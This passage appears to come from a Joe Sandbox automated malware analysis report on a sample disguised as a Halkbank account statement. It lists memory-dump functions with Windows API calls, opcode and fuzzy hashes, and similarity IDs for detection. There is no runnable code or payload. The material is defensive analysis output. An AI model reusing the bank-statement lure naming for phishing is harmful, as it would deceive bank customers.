                                                              • Opcode Fuzzy Hash: f68fec016996bab61e849e414155b8e1cc7872ea6b5c934684a6c22ef7d3b935
                                                              • Instruction Fuzzy Hash: C61113B5C002498FCB20DF99D589BDEBBF4EB48324F148459D968A7340C738AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027033F8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0270345D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 42dc05487baa7b34e8362b7045c06d52a2fd21a6f4a861a68fe11facdda31d54
                                                              • Instruction ID: 6ada57570750b82a67b4870930d38d27234b224629f183356af376792b17e5b0
                                                              • Opcode Fuzzy Hash: 42dc05487baa7b34e8362b7045c06d52a2fd21a6f4a861a68fe11facdda31d54
                                                              • Instruction Fuzzy Hash: CF1113B5800249DFCB10CF99D985BEEBFF8EB48310F10845AE559A7210C375A584CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027008C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 0ecf50072cbec96ab5c0786d67a4081d67f88526140d9fe19e3f4fd7f9e8a873
                                                              • Instruction ID: 5b0c3b4591055796c92c08d3b9f0c15121fcd0680187f74e94e204ddb6537e20
                                                              • Opcode Fuzzy Hash: 0ecf50072cbec96ab5c0786d67a4081d67f88526140d9fe19e3f4fd7f9e8a873
                                                              • Instruction Fuzzy Hash: EF1125B5D003498BDB20DFAAD4457AFFBF4EB88324F248419D419A7240CB75A945CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02705178 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 027051D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: b3f75cd8c4d745249069f6c97e042b102c7f5ce98d60ea5a2b1c7d7bfaee20e2
                                                              • Instruction ID: dd790aafe0cb729796240bf206b35b2666ae7ffc3a40e01f353ea8eaf913efd1
                                                              • Opcode Fuzzy Hash: b3f75cd8c4d745249069f6c97e042b102c7f5ce98d60ea5a2b1c7d7bfaee20e2
                                                              • Instruction Fuzzy Hash: BD11F2B5C00249CFCB10DF9AD585BDEBBF4EB48324F25845AD968A7240D338AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02702D78 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0270345D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 50cff52523c46baffe2b77115423e06ec8eaada6e9f13a008ed854379bb1e233
                                                              • Instruction ID: b0a129454d52b64f7469c46287b704d4922e1af91fd29fe543a3fb83d5249267
                                                              • Opcode Fuzzy Hash: 50cff52523c46baffe2b77115423e06ec8eaada6e9f13a008ed854379bb1e233
                                                              • Instruction Fuzzy Hash: 7C11F5B5900349DFCB10DF99D884BEEBBF8EB48314F10845AE959A7240C375A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0255B01E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: ce4ca548fcab42913faf78d86a1d92e2f49c7e0e9de2de572340c456520c235c
                                                              • Instruction ID: f98fbf2f2e654924a4cd3b47a522d897cc14f6fe7b742902ced6a0c98c2e7dea
                                                              • Opcode Fuzzy Hash: ce4ca548fcab42913faf78d86a1d92e2f49c7e0e9de2de572340c456520c235c
                                                              • Instruction Fuzzy Hash: 1C11DFB5C002598FCB14CF9AD448ADEFBF4FF88218F14845AD829A7210D375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D48ED8 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: b6ad9533fd7da398b57e6f94f467321e0691642f1e989ffeb387a8d8d24c1790
                                                              • Instruction ID: ac5860b090ead8bd172b67148cdd47756454968a59f8aac4ca3008662359d792
                                                              • Opcode Fuzzy Hash: b6ad9533fd7da398b57e6f94f467321e0691642f1e989ffeb387a8d8d24c1790
                                                              • Instruction Fuzzy Hash: 0B51D171B002068FCB45EF7A98A89AFBBF6FFC52107158969E455DB391EB309D018790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D49C10 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 94cd5a8399f264ab84c512c88ff8bebca3c30c24d33c023d9d986d3631526718
                                                              • Instruction ID: aefe663d3c2e8e35627e32e8ee5c40a4effbbbd3a1a56861ca339f50166f3724
                                                              • Opcode Fuzzy Hash: 94cd5a8399f264ab84c512c88ff8bebca3c30c24d33c023d9d986d3631526718
                                                              • Instruction Fuzzy Hash: 11112E71F0021A8BCB54EFB998505EFBBF6ABC4711B204579C505EB344EB358D02CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4C4F0 Relevance: .2, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8857a8a4d7e8f0b5ebd6d3afa928bc4c4974fba1ca56fa0888c1879998bc3acb
                                                              • Instruction ID: b437aa34086c8f4b50b36077a4060a47f37895452ceec4d08adeceef9bad478f
                                                              • Opcode Fuzzy Hash: 8857a8a4d7e8f0b5ebd6d3afa928bc4c4974fba1ca56fa0888c1879998bc3acb
                                                              • Instruction Fuzzy Hash: 6451E174E26219DFDB54EFA9D5809ADBBB1AB49310F10952AE816EB350D730AC42CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D483F0 Relevance: .1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a98ab8df1c26f5bcd0906d0be31996d0e78255900fefbd58b43298b9407e01e
                                                              • Instruction ID: d8f2e6138ffd17d85cdff5bbb32dc5172e577f8aa9082b1c3e230e3dd7f60022
                                                              • Opcode Fuzzy Hash: 2a98ab8df1c26f5bcd0906d0be31996d0e78255900fefbd58b43298b9407e01e
                                                              • Instruction Fuzzy Hash: 7E51F7B5E042089FDB48DFA9D984AEEBBF6EB88311F109025E906B7354CB749941CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D481D8 Relevance: .1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68490f106808c97e6331a0147b0c9e3a137085e5fdfc3335dd70a4aaf6941830
                                                              • Instruction ID: 6ef6a74334f74be138c4902566f5aab078818c173fc9d158ca1d3ac1e3e697b9
                                                              • Opcode Fuzzy Hash: 68490f106808c97e6331a0147b0c9e3a137085e5fdfc3335dd70a4aaf6941830
                                                              • Instruction Fuzzy Hash: BD41CE75E012199FCB00EFA8D584AEEBBB2FB88320F109565E914A7354CB719994CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4B300 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9160dbb5671dc0d419b851b1310ad467207db71f5d6cbfcca0b3c6159ef2b8f
                                                              • Instruction ID: d99fc49b67ce80bff39149feb793def0f46119479c4efcb9b307a4c5a064663c
                                                              • Opcode Fuzzy Hash: b9160dbb5671dc0d419b851b1310ad467207db71f5d6cbfcca0b3c6159ef2b8f
                                                              • Instruction Fuzzy Hash: 303169B5D002099FCB54DFA9D888ADEBFF9EB48310F14842AE809E7310D334A945CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D47EC8 Relevance: .1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97b9f86cec4cae7171b242132b1a26b3b04a253f14075c859227f6ecfc417e00
                                                              • Instruction ID: f9243bb31e4081095f8760259660483568dd9f497d0e743691f09856ffe6c395
                                                              • Opcode Fuzzy Hash: 97b9f86cec4cae7171b242132b1a26b3b04a253f14075c859227f6ecfc417e00
                                                              • Instruction Fuzzy Hash: 6D3127B5E00209AFCB45DF98D880AEEBBB2FF88310F108565E914AB354D7709A41CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ACD4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978915049.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_acd000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 519b520d559dd13e74e450019f4528a8e5b5002bb7e27de0c7db8a7dcd25b917
                                                              • Instruction ID: 4f3e39ba7df5bab45f53a3f52fda004deffade116cb3bb456af44d8e22e18387
                                                              • Opcode Fuzzy Hash: 519b520d559dd13e74e450019f4528a8e5b5002bb7e27de0c7db8a7dcd25b917
                                                              • Instruction Fuzzy Hash: 672100B2504248EFDB05DF14D9C0F26BFA5FB98318F24C57DE90A0B256C336D816CAA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ADD01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978959016.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb43a28825e5be5625d931816cad94beda40c88b6454e825f366fa42e1a7a900
                                                              • Instruction ID: a569fb547fc1e5c7ab4c78825b605f4407572b5add2dfc0f70ffd0d5eda21a07
                                                              • Opcode Fuzzy Hash: fb43a28825e5be5625d931816cad94beda40c88b6454e825f366fa42e1a7a900
                                                              • Instruction Fuzzy Hash: B921D0B5604240EFDB14DF24D984B26BBA5EBC8314F24C96AD80B4B386C33AD807CA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ADD1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978959016.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dba76d0969e63109c57120d12f5b515293d1fc207f68b8a38e559cdd43537058
                                                              • Instruction ID: 36c447d6c7cd474d176d50cdacb174e93886ea1f183966fda181cf7cd850b8c1
                                                              • Opcode Fuzzy Hash: dba76d0969e63109c57120d12f5b515293d1fc207f68b8a38e559cdd43537058
                                                              • Instruction Fuzzy Hash: 9B2126B1504200EFDB05DF54D9C0B66BBB5FB84314F34CA6EE84A4B392C336D806CA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4B600 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41d2e11f33e4929d6b5375a5009e53681196a19f0ff2853342479bc5bc1c1cb4
                                                              • Instruction ID: 482f468fd201b1abd56626add82158888e365f504e70d702c8ab9e4d83de9343
                                                              • Opcode Fuzzy Hash: 41d2e11f33e4929d6b5375a5009e53681196a19f0ff2853342479bc5bc1c1cb4
                                                              • Instruction Fuzzy Hash: B811E271A0D388AFDB42DB788D6949A7FF9DF0610071544EBD884CB293E9308D06C372
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D47BE0 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a7cdc9b94c6d081add3f4e3ac810eed39108fcda06f879feee05e4e7756958e
                                                              • Instruction ID: 78266beab69d53a9ae62267c70aac03b7ea2dc398251903669f906d3b91ef0e3
                                                              • Opcode Fuzzy Hash: 0a7cdc9b94c6d081add3f4e3ac810eed39108fcda06f879feee05e4e7756958e
                                                              • Instruction Fuzzy Hash: 0831F4B4E00908DFC748DF6AE684A9DBBF2FF88300B6281D5D5489B365DB70AE51DB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D49078 Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92e83845a048d1bf44af0e0ba28a59dd0a0cd83fb332de7c52cb63fa71300923
                                                              • Instruction ID: e050fc4a1e59bef9f73a79eed1190610f90096d6dd117f9af61fd859e30db686
                                                              • Opcode Fuzzy Hash: 92e83845a048d1bf44af0e0ba28a59dd0a0cd83fb332de7c52cb63fa71300923
                                                              • Instruction Fuzzy Hash: 5531C0B0D11318DFDB60DF9AC998B8EBBF5AB48314F24806AE405BB250C7B59885CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ADD005 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978959016.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3006b0271366ac61788f3cb5c229d1b9990d1ad8090702269ec4dd2eea066fdf
                                                              • Instruction ID: 624d6dd7452e363bd2bc5d0349d940c1a6a4252461fc6911452aac4c81693b3b
                                                              • Opcode Fuzzy Hash: 3006b0271366ac61788f3cb5c229d1b9990d1ad8090702269ec4dd2eea066fdf
                                                              • Instruction Fuzzy Hash: 412184755093C08FDB16CF24D994715BF71EB85314F28C5DBD84A8B697C33A980ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4B310 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76454e75f86efc3460d2611655f9173f4531c249dbdf81ce77c69e868ce452db
                                                              • Instruction ID: 96dddd126d6d84a89cbef59be89c5a0d824440fad7adf80d5033cd457c865fc5
                                                              • Opcode Fuzzy Hash: 76454e75f86efc3460d2611655f9173f4531c249dbdf81ce77c69e868ce452db
                                                              • Instruction Fuzzy Hash: 4B21D0B5D043499FDB50DFAAD884ADEBBF4FB48320F10842AE919A7310C375A954CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ACD4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978915049.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_acd000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction ID: 456336bc2bb819161cec2ec989a87338ff104a75f095270fc692582a46ce6bab
                                                              • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction Fuzzy Hash: B211D376504284CFCB16CF14D9C4B16BF71FB94314F24C6ADD8490B656C336D85ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ADD1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1978959016.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_add000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction ID: 777b5d88bfedfe8c03339cc32d0e08a21f427551b8ea96247c645c9c97a60aec
                                                              • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction Fuzzy Hash: 3C11BB75904280DFCB02CF10D5C4B55BBB1FB84314F24C6AAD84A4B796C33AD80ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D47D78 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53d66598ef5f69da87046c295484ecd20f26949010c7a846838401676e664a89
                                                              • Instruction ID: 97526cef6e25aedddab0b3b021e2b30fbf819ad5d2d33b8db59f6e9fd6352407
                                                              • Opcode Fuzzy Hash: 53d66598ef5f69da87046c295484ecd20f26949010c7a846838401676e664a89
                                                              • Instruction Fuzzy Hash: 7B11C3B8E00508DFC740DFA9E188A9DBBF1FB88310F5281D5D984AB355C770EAA0CB45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D469B0 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edb67cb10f1a445e03bb33b81dc378ffba59ff69cd2bb2e219b19d113742d4ce
                                                              • Instruction ID: 5ad7f68a71fe978b4fa43129f362db3fb1fc5221b05de7e358bc660d7efaa2a3
                                                              • Opcode Fuzzy Hash: edb67cb10f1a445e03bb33b81dc378ffba59ff69cd2bb2e219b19d113742d4ce
                                                              • Instruction Fuzzy Hash: 8BE012F1805148DFCB91FFB5D50469E7BF9EB0B305F0045A6960A97111EBB28E04DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D47D38 Relevance: .0, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d485ad042fb6e7464376a75aa04954a973fd212363c1c08ec55970ad1633f6c0
                                                              • Instruction ID: 44fe974a642c5e388ca4fd9bf11cf31a16313508da432368e09adee74abb4399
                                                              • Opcode Fuzzy Hash: d485ad042fb6e7464376a75aa04954a973fd212363c1c08ec55970ad1633f6c0
                                                              • Instruction Fuzzy Hash: DAE0C274908108DBCB04EFA4E5405BCBBB9EB85300F1081ADC80827350CBB1AE02DB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4EE28 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8dc3c503f62e3138968043e5ce080ac34c5ed61ff5fadee0a71a463a5ffbe5d8
                                                              • Instruction ID: 1101996346da2f49c9be1bb7bf6429edb2171682602ca4f3e9f9c89431dfb551
                                                              • Opcode Fuzzy Hash: 8dc3c503f62e3138968043e5ce080ac34c5ed61ff5fadee0a71a463a5ffbe5d8
                                                              • Instruction Fuzzy Hash: 9CE017B0E41208EFCB80EFB8D54969CBBF5AB04205F1041AAD908E3340EB705E44CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4E3D8 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16fb3d336e528a00c84137de7ae7426abb11ec86f7b5146924b049b00e55e97e
                                                              • Instruction ID: 96a1a3ce2c27ddac0742defa6b08a17409c610e6e86d78bcf48ae57cb1fcc0ea
                                                              • Opcode Fuzzy Hash: 16fb3d336e528a00c84137de7ae7426abb11ec86f7b5146924b049b00e55e97e
                                                              • Instruction Fuzzy Hash: 73C08C700422048BC3143BAAA60C3247BBE6B00206F006065F308464608AB05408CB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 06D46A00 Relevance: 6.0, Strings: 4, Instructions: 1015COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$Te]q$paq$xb`q
                                                              • API String ID: 0-4160082283
                                                              • Opcode ID: d5448bd739e9923d03b0e2b7657698b53649b7b66161128a2b15dbb94ab1b657
                                                              • Instruction ID: 04699710642ac8b26a1b6667a21d1b8a8e408cc5909be17569ce1ebd9b28feff
                                                              • Opcode Fuzzy Hash: d5448bd739e9923d03b0e2b7657698b53649b7b66161128a2b15dbb94ab1b657
                                                              • Instruction Fuzzy Hash: DCB2B075E00628CFDB64DF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700040 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
